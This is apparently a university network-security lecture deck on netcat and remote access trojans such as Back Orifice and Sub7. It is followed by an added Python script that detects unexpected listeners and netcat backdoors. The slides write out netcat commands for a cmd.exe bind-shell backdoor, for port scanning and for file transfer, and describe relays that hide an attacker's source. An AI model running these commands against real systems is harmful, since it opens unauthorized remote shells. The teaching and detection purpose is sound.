GT ECE 4112 - Backdoors and Trojans

This preview shows page 1-2-3-19-20-39-40-41 out of 41 pages.


Slide titles: Backdoors and Trojans; Agenda Overview; Agenda Netcat; Netcat – TCP/IP Swiss Army Knife; Netcat; Netcat – Major Features; Netcat – Major Features (contd); Netcat (called ‘nc’); Netcat – Client mode; Netcat - listen mode; Netcat - Configuration; Netcat - Installation; Netcat – Possible uses; Netcat – File transfer; Netcat – Scan ports; Netcat – Create backdoors; Netcat – Create relays; Netcat Defenses; Summary Netcat; Agenda Trojans/Backdoors; Malicious Remote Access Tools; Back Orifice; Back Orifice (cont.); NetBus; Slide 25; Slide 26; Slide 27; Sub7; Sub7; Slide 30; Slide 31; Slide 32; Sub7 Screenshot #1; Sub7 Screenshot #2; Sub7 Screenshot #3; Sub7 Screenshot #4; How attackers find an infected PC; Defense against Trojans/Backdoors; Virtual Network Connections; Slide 40; Summary

Backdoors and Trojans
ECE 4112 - Internetwork Security

Agenda Overview
• Netcat
• Trojans/Backdoors

Agenda Netcat
• Netcat
  – Overview
  – Major Features
  – Installation and Configuration
  – Possible Uses
• Netcat Defenses
• Summary

Netcat – TCP/IP Swiss Army Knife
• Reads and writes data across the network using TCP/UDP connections
• Feature-rich network debugging and exploration tool
• Part of the Red Hat Power Tools collection and comes standard on SuSE Linux, Debian Linux, NetBSD and OpenBSD distributions.
• UNIX and Windows versions available at: http://www.atstake.com/research/tools/network_utilities/

Netcat
• Designed to be a reliable “back-end” tool – to be used directly or easily driven by other programs/scripts
• Very powerful in combination with scripting languages (e.g. Perl)
“If you were on a desert island, Netcat would be your tool of choice!” - Ed Skoudis

Netcat – Major Features
• Outbound or inbound connections
• TCP or UDP, to or from any ports
• Full DNS forward/reverse checking, with appropriate warnings
• Ability to use any local source port
• Ability to use any locally-configured network source address
• Built-in port-scanning capabilities, with randomizer

Netcat – Major Features (contd)
• Built-in loose source-routing capability
• Can read command line arguments from standard input
• Slow-send mode, one line every N seconds
• Hex dump of transmitted and received data
• Optional ability to let another program service established connections
• Optional telnet-options responder

Netcat (called ‘nc’)
• Can run in client/server mode
• Default mode – client
• Same executable for both modes
• client mode
    nc [dest] [port_no_to_connect_to]
• listen mode (-l option)
    nc -l -p [port_no_to_connect_to]

Netcat – Client mode
Computer with netcat in client mode
1. Input comes from a standard input device
2. Passes through netcat in client mode
3. Output is sent across the network to any TCP/UDP port on any system

Netcat - listen mode
Computer with netcat in listen mode
1. Input comes from the network on any TCP/UDP port
2. Passes through netcat in listen mode
3. Output appears on standard output device

Netcat - Configuration
• LINUX installation
    tar xvfs netcat.tar.gz
    cd netcat
    make linux
    cp nc /usr/local/sbin
Note: The last command will allow you to run netcat without having to specify the directory

Netcat - Installation
• Windows Installation
  – Copy file nc11nt.zip in a folder
  – Unzip this file – creates a directory called nc11nt
  – To run netcat – go to the nc11nt folder and run it from there

Netcat – Possible uses
• Transfer files
• Scan ports
• Create backdoors
• Create relays
• Many more…

Netcat – File transfer
Scenario: Attacker wants to transfer a file to another machine, only one port open and that is not FTP port
Windows – nc listener (IP: a.b.c.d)
    c:\ nc -l -p 1234 > testfile.txt
Linux – nc client (IP: a.b.c.d)
    nc a.b.c.d 1234 < testfile.txt

Netcat – Scan ports
Goal: To scan ports without using nmap
Send H-E-L-L-O to each target
On the client machine
    echo Hello | nc -v -w 3 -z a.b.c.d 1-200
This will go to various TCP or UDP ports on the target machine

Netcat – Create backdoors
• On Windows machine, create netcat backdoor listener that runs cmd.exe shell
    c:\ nc -l -p 7777 -e cmd.exe
• Connect to this backdoor by running netcat in client mode on Linux machine
    nc a.b.c.d 7777
• Can send commands like “cd” and “mkdir”

Netcat – Create relays
Can be used to bounce connections between systems. Obscures attacker’s source
1. Create a relay on the Linux machine
2. Configure the relay to forward data to another port on the Linux machine
3. At the other port, set up a netcat backdoor shell
4. Connect to the relay from the Windows machine using netcat in client mode

Netcat Defenses
• For file transfer and port scanning – Close all unused ports
• For backdoors
  – Close unused ports
  – Carefully audit system usage
    – Check applications running with root privileges
    – Close suspicious programs
• For relays – Multiple layers of security

Summary Netcat
• Netcat
  – Overview
  – Major Features
  – Installation and Configuration
  – Possible Uses
• Netcat Defenses
Next – Trojans/Backdoors

Agenda Trojans/Backdoors
• Malicious Remote Access Tools
  – Backdoors
  – Trojans
• Defenses against Trojans/Backdoors
• Virtual Network Channels
• Summary

Malicious Remote Access Tools
• Backdoors
  – Also called a “trapdoor”
  – An undocumented way of gaining access to a program, online service or an entire computer system.
  – Allows privileged operations to be executed on the affected machine
• Trojan Horse
  – Does not replicate or copy itself
  – Damages or compromises the security of the computer
  – It relies on someone emailing it to you. It does not email itself

Back Orifice
• Authored by Cult of the Dead Cow
• Released on 3rd Aug 1998
• Allows remote manipulation of
  – File system
  – Registry
  – System
  – Passwords
  – Network
  – Processes

Back Orifice (cont.)
• First widely used trojan
  – Complete Implementation of services supported by the Windows 95/98 API
  – Small,
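
Added example (not part of the original slides): the "Netcat Defenses" advice to close unused ports and check what runs with root privileges, written as a Python audit that joins listening sockets to their owning processes and flags netcat listeners started with -e. The sample `ss`/`ps` text, the port allowlist and all function names are constructed for illustration.

```python
import re
import shlex

# Constructed sample data (not from the slides): listening sockets in the
# style of `ss -H -ltnp`, and processes in the style of `ps -eo pid,user,args`.
SS_SAMPLE = """\
LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=812,fd=3))
LISTEN 0 1 0.0.0.0:7777 0.0.0.0:* users:(("nc",pid=4021,fd=3))
LISTEN 0 1 0.0.0.0:1234 0.0.0.0:* users:(("nc",pid=4100,fd=3))
"""
PS_SAMPLE = """\
812 root /usr/sbin/sshd -D
4021 root nc -l -p 7777 -e /bin/sh
4100 alice nc -l -p 1234
"""
ALLOWED_PORTS = {22}  # assumption: the only service this host should expose
NC_NAMES = {"nc", "nc.exe", "ncat", "netcat"}
LISTENER = re.compile(r':(\d+)\s+\S+\s+users:\(\("([^"]+)",pid=(\d+)')


def parse_ps(text):
    """Map pid -> (user, argv) from `ps -eo pid,user,args` style lines."""
    procs = {}
    for line in text.splitlines():
        pid, user, args = line.split(None, 2)
        procs[int(pid)] = (user, shlex.split(args))
    return procs


def audit(ss_text, ps_text, allowed=ALLOWED_PORTS):
    """Return one finding per listener on a port outside the allowlist."""
    procs = parse_ps(ps_text)
    findings = []
    for line in ss_text.splitlines():
        m = LISTENER.search(line)
        if not m or int(m.group(1)) in allowed:
            continue  # unparsable line, or a port that is meant to be open
        port, pid = int(m.group(1)), int(m.group(3))
        user, argv = procs.get(pid, ("?", []))
        reasons = ["unexpected listener"]
        if user == "root":
            reasons.append("runs as root")
        # The backdoor form shown on the slides: nc -l -p PORT -e PROGRAM
        if argv and argv[0].rsplit("/", 1)[-1] in NC_NAMES and "-e" in argv:
            reasons.append("netcat -e (program attached to socket)")
        findings.append({"port": port, "pid": pid, "user": user, "reasons": reasons})
    return findings
```

On a live Linux host the two inputs would come from `ss -H -ltnp` and `ps -eo pid,user,args` run as root, so that every socket's owning process is visible.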

